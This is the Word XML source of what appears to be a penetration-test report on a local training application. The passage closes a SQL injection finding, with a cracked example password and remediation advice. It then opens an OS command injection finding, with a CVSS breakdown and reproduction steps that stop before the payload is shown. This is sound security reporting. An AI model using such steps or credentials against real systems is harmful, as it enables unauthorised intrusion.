      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="3794CE93" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>Example decoded credential: gordonb hash decodes to 'abc123' via MD5 rainbow table lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="637805D2" w14:textId="375D9D43">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="6A40592C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="4E8D3BF3" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>This vulnerability exposes the application to the following risks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="695C57F8" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Unauthorized access to user accounts and credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="1F6583AC" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Full database data exfiltration including password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="2D9AAE08" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Credential compromise enabling account takeover</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="1402F1C6" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Privilege escalation and sensitive data leakage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="7363A3A6" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Potential remote system compromise depending on backend database permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="326D367F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Because exploitation requires minimal effort, this represents an immediate critical risk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="463F29E8" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="294BB903" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Recommended Fix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="3D755311" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Use parameterized queries / prepared statements for all database interactions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="23346D19" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Implement strict server-side input validation and reject special characters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="72E866F7" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Apply least privilege access for all database accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="2CA429C8" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Implement Web Application Firewall (WAF) protections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="0374602D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Avoid exposing detailed database errors in HTTP responses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="56BE09FD" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Store passwords using strong hashing (bcrypt/Argon2) with salting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="37FF204C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Perform regular secure code reviews and security testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="3B7B4B86" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="356A7C40" w:rsidRDefault="356A7C40" w14:paraId="44097E03" w14:textId="77777777">
      <w:pPr>
        <w:pageBreakBefore/>
        <w:shd w:val="clear" w:color="auto" w:fill="2E5FA3"/>
        <w:spacing w:before="200" w:after="100"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>F-003  |  OS Command Injection Leading to Arbitrary Server Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="3A0FF5F2" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pP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7160"/>
      </w:tblGrid>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="1490AB85"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4938E95B" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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285BB9EA" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OS Command Injection Leading to Arbitrary Server Command Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="296C86E9"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123CE2F9" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FADBD8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="162C51E1" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="5D509D0A"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634B34B8" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Score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42CD2C12" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="6A77011F"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597BD8B9" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Vector</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356A7C40" w14:paraId="43F1FD0C" w14:textId="77777777">
            <w:r w:rsidRPr="356A7C40">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="18DCA8F8"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1E597E86" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Category</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125B70A9" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A03: Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="6E5238CB" w14:textId="77777777">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00966105" w:rsidRDefault="00191B85" w14:paraId="0DB3501B" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected URL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tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="03474CE8" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>http://localhost:4280/vulnerabilities/exec/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="5630AD66" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="513D93E2" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="0E6DB7EA" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>The application is vulnerable to OS Command Injection through the ip input parameter in the command execution module. The application directly passes user-supplied input into underlying system shell commands without proper sanitization or validation. By injecting chained shell commands, it was possible to execute arbitrary operating system commands on the host server. A single payload successfully retrieved the currently logged-in system user, the server working directory, a directory listing, and detailed operating system information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="61829076" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="429AEE1D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>CVSS Breakdown</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>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160"/>
        <w:gridCol w:w="2520"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="62ACE37D" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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3AF6F8F3" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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5422737E" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Value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00966105" w:rsidRDefault="00191B85" w14:paraId="32620A7F" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="4CDE7ED0"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6D84DD83" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Version</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3B1D8E5" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.1</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22B0A6E" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Common Vulnerability Scoring System version used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="71D1B411"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6DC14F75" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Vector (AV)</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9B59493" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N (Network)</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1973F5D" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The vulnerability can be exploited remotely over a network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="290D4E30"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665B27A" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Complexity (AC)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4ACAEBBE" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>L (Low)</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3EE0EB7" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitation is straightforward and does not require special conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="3F26EE44"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610E9F4E" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privileges Required (PR)</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33D8F941"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104176A8" w14:textId="77777777">
            <w:r w:rsidRPr="356A7C40">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No authentication or prior access is required to exploit the vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="48F67310"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1D2CBA56" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User Interaction (UI)</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7D2C6E2F" w14:textId="77777777">
            <w:r>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356A7C40" w14:paraId="1AEB1A73" w14:textId="77777777">
            <w:r w:rsidRPr="356A7C40">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No action from another user is required for successful exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="1E95964C"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697D15DD" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scope (S)</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3F9A2E06" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>U (Unchanged)</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704126E9" w14:textId="77777777">
            <w:r w:rsidRPr="356A7C40">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The impact remains within the same security boundary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="55FAC757"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DDEC117" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confidentiality Impact (C)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7E79A9D"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8DA057B" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sensitive data can be fully disclosed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="0CD31E4C"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593497BB" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Integrity Impact (I)</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2F134670"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356A7C40" w14:paraId="330BDFAB" w14:textId="77777777">
            <w:r w:rsidRPr="356A7C40">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Data can be modified or tampered with</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="564920D4" w14:textId="77777777">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2ABB17F2" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Availability Impact (A)</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09B326B3" w14:textId="77777777">
            <w:r>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0966105" w:rsidRDefault="00191B85" w14:paraId="581A0720" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Service or system availability can be significantly affected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="00494639" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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3DE4E2DF" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Overall Score</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00A871CA" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8 (Critical)</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cMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="44549492" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severe vulnerability with maximum business and security impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="2BA226A1" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="6D8A004C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="0EC0B086" w14:paraId="265B4E9D" w14:textId="30B1DEDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to the command execution page: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="0EC0B086" w14:paraId="5FCBB18E" w14:textId="6309B7C2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>http://localhost:4280/vulnerabilities/exec/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="0EC0B086" w14:paraId="12BDE4D0" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Intercept the request using Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="1CD77F7D" w14:paraId="75F2658C" w14:textId="7B29AA50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Modify the ip parameter with a chained command injection payload: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="1CD77F7D" w14:paraId="45019B17" w14:textId="6263CF08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
